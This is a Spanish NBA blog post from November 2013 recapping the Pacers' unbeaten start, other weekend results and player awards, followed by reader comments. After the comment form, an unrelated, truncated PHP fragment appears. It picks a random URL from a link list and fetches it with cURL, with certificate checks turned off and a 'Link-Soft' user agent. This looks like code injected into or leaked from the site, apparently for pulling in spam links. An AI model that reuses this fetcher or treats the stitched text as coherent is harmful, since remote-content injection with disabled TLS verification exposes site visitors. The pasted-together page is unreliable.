Informe de fin de semana: Históricos Pacers

11 de November de 2013 por TheDeerHunter

Termina la segunda semana de competición y los Pacers mantienen su condición de invictos. El mejor arranque de la historia de la franquicia les sirve para abrir una pequeña brecha en la clasificación de una conferencia este que nos está sorprendiendo a todos por su igualdad e irregularidad.

“Philadelphia, Boston y Orlando en playoffs; Brooklyn últimos” Ruxixón.

En efecto, dos destacados en la conferencia durante este fin de semana pero por motivos opuestos. En lo positivo Boston, que al contrario que en su mala racha inicial, supo imponerse en dos choques igualados, uno de ellos ante los campeones (que se empeñan en entorpecer a los pretendientes de Wiggins) con canasta-milagro incluida de Jeff Green. El primero se lo había ganado a Orlando, que también perdería el sábado ante Atlanta lo que provocaría que la cita anterior dejara de ser exacta.

“Los Celtics le han cogido el gusto a ganar… con un 35,8% de acierto en tiros de campo pero una defensa en condiciones.” Franitis. 

En lo negativo los Nets se pusieron colistas del Este. Perdieron sus dos choques por los pelos, uno de ellos ante los intratables líderes y el otro ante los Wizards en la prórroga. Se les ha puesto bien a caldo. Es el precio que hay que pagar en un proyecto como este si los resultados no acompañanan. Sin piedad con los nuevos ricos. El destino también ha querido que compartan posición con sus vecinos Knicks. El viernes lograron estropear el debut de Ewing como técnico de Bobcats con actuación portentosa (y noticiosa) de Bargnani  pero ayer los Spurs les ponían en su sitio… De lo peorcito ahora mismo de toda la liga.

Terminando con el repaso del fin de semana en el Este, interesante doble enfrentamiento Sixers-Cavs, que quedaría en tablas, pero que a los dos les sirve para mantener puestos de privilegio (sin exigir el 50% de victorias). Ambos impusieron su condición de local y el duelo Irving vs Carter-Williams del sábado ha sido de lo mejor de los últimos días.

“Este Carter-Williams es un jugón en toda regla!!! ¿Cómo es que nadie se dio cuenta y cayó tanto en el draft?” Vader.

En el Oeste la situación tiene algo más de lógica con un listón más alto para la criba de postemporada y varios equipos que comienzan a descolgarse claramente.

Si en la otra conferencia comenzábamos con el 7-0 de Pacers ahora debemos mencionar el 0-7 de Utah. Estos sí se han tomado en serio el “tanqueo” pero es que están diseñados para ello. Se puede perder ante los Bulls (en horas bajas), pero hacerlo de 25 ante los Raptors… Nuggets y Kings tampoco les andan a la zaga. Los primeros perdían el viernes ante Suns y Sacramento lo hacía por dos veces ante Blazers. Sorprende la estupenda situación de Blazers y Suns, bien colocados en la zona noble. Algo mejor que otro de los equipos de moda en el blog ahora mismo. Los Pelicans perdieron precisamente anoche ante los de Arizona, situándose con una única victoria sobre los criticados Nets, la que le ganaron a los Lakers el otro día.

La cabeza de la conferencia vuelve a ser de los Spurs, que casi de forma silenciosa vuelven al lugar que les corresponde. Ganaron a base de defensa a los Warriors (que también cayeron ante Memphis) y anoche trituraron ofensivamente a los Knicks. Está claro que son el equipo versátil por antonomasia. Los Thunder les siguen de cerca, tras haber recuperado parte de su crédito con su solvente victoria en Detroit y la de la prórroga de anoche ante Wizards, con conato de pelea entre Westbrook y Nene.

Los Wolves se ponen arriba destrozando a Mavs y Lakers (rompiendo de esta manera la pésima racha que acumulaban ante los amarillos de 22 derrotas consecutivas). Ritmo MVP de Kevin Love; sorpresa de la temporada para Kevin Martin y segundo triple doble de la carrera de Ricky.

“¿Y no crees que Ricky Rubio está involucionando? ” Denise.

PREMIOS

MVP: Kevin Love y Kevin Durant se han picado durante el fin de semana. Ambos han conseguido dos victorias y ambos han destacado sobre los demás. El de los Wolves fue el mejor del viernes con 32 puntos, 15 rebotes y 8 asistencias aunque el de los Thunder se quedó cerca con 37 puntos, 8 rebotes y 7 asistencias. Ayer se intercambiaron los tornas: Durant se fue a los 33 puntos, 13 rebotes y 6 asistencias y Kevin Love se quedó en 25 puntos y 13 rebotes.

Rookie: Michael Carter-Williams sigue a un nivel muy por encima de lo esperado. Los Sixers perdieron el sábado ante los Cavs pero él acabo con 21 puntos, 7 rebotes y 13 asistencias. El viernes, Steven Adams había explotado con 17 puntos, 10 rebotes y 3 tapones. ¿Por fin vuelven a tener pívot los Thunder?

Sorpresa: 2 victorias de los Suns este fin de semana con Markieff Morris marcando la pauta. El viernes anotó 28 puntos y capturó 10 rebotes y ayer consiguió 23 puntos y 5 rebotes. Aún más sorprendente fueron los 25 puntos8 rebotes y ¡5 tapones! que el italiano Andrea Bargnani se marcó el viernes. Para mear y no echar gota.

Comenta

61 comentarios a esta entrada

  1. Nacho dice:
    #1

    Esto… ¿quien es Griffin?

      Citar

  2. franitis dice:
    #2

    El de “Padre de Familia”…

      Citar

  3. Pop dice:
    #3

    Qué cansinismo por favor. Entro en el blog y veo 50 comentarios y me froto las manos y saliveo, y en vez de eso he acabado con la cabeza hirviendo. En fin, yo ya me las tuve en el post de los mejores PFs y el asunto Malone.

    Tachar a este blog de pronacionalista es de juzgado de guardia. Y encima es porque se menciona que Rubio ha hecho un triple doble, algo que como todos sabemos todos los jugadores de la NBA hacen día sí y dia también.

    En fin, aparte de la irritación ocular por las formas de escribir, siento decir que Esteban se acerca muchas veces al troleo puro y a los flames.

      Citar

  4. Esteban dice:
    #4

    es que al no estar sancho88 tengo que buscar un nuevo rival, esta en mi naturaleza jaja

    igualmente lo que pienso de Griffin es asi, y no he visto a sus fans hablar de sus proezas

    lo que pienso de davis, pues creo que es asi

    lo de Irving y Rubio en su año rookie, tambien lo creo

    y lo del nacionalismo, es de hecho asi, los que no somos españoles lo notamos, se los aseguro

      Citar

  5. Esteban dice:
    #5

    Pop:

    En fin, aparte de la irritación ocular por las formas de escribir, siento decir que Esteban se acerca muchas veces al troleo puro y a los flames.

    pues que coincidas o no conmigo, pero creo tener argumentos, y de hecho veo pocos rebatidos aquí, mas que poner en mi boca palabras en contra de malone, Barckley y demás que yo no he dicho

      Citar

  6. Esteban dice:
    #6

    oh mi querido Paul GEORGE, espero que este arranque estelar de temporada no lo maree mucho, pero los ultimos juego que le he visto, ha tirado mas de la cuenta y no del todo bien, quiza es sugestion, pero pareciera que busca sus puntos, y en un equipo con tantas variantes, puede terminar por ser un problema

      Citar

  7. HisRoyalAirness dice:
    #7

    Está terminando el tercer cuarto e Irving lleva 2 puntos-1 rebote-2 asistencias. Algo que decir?

      Citar

  8. HisRoyalAirness dice:
    #8

    Por lo de los hace números y esas cosas

      Citar

  9. franitis dice:
    #9

    Tanto hablar de Ricky y de Irving y aquí el PG que “lo peta” es Jordan Crawford… XD

      Citar

  10. Blade Petrovic dice:
    #10

    melo15:
    Que opinais de un nuevo rumor que situa a Shumpers en Denver y a Kenneth Fraied en New York? Yo no lo veria mal, Shumopert es bueno pero Faried es muy necesario.
    Aunque preferiria dar a JR.

    No creo que los Nuggets aceptaran a JR, porque buscan defensa exterior. Me parece bueno para los dos, porque los Nuggets ganan defensa, rebote y presencia interior que es lo que hace falta. Pasaría Bargnani apívot?

      Citar

  11. Blade Petrovic dice:
    #11

    Además Hardaway JR ganaría minutos y me parece que puede progresar muy bien

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>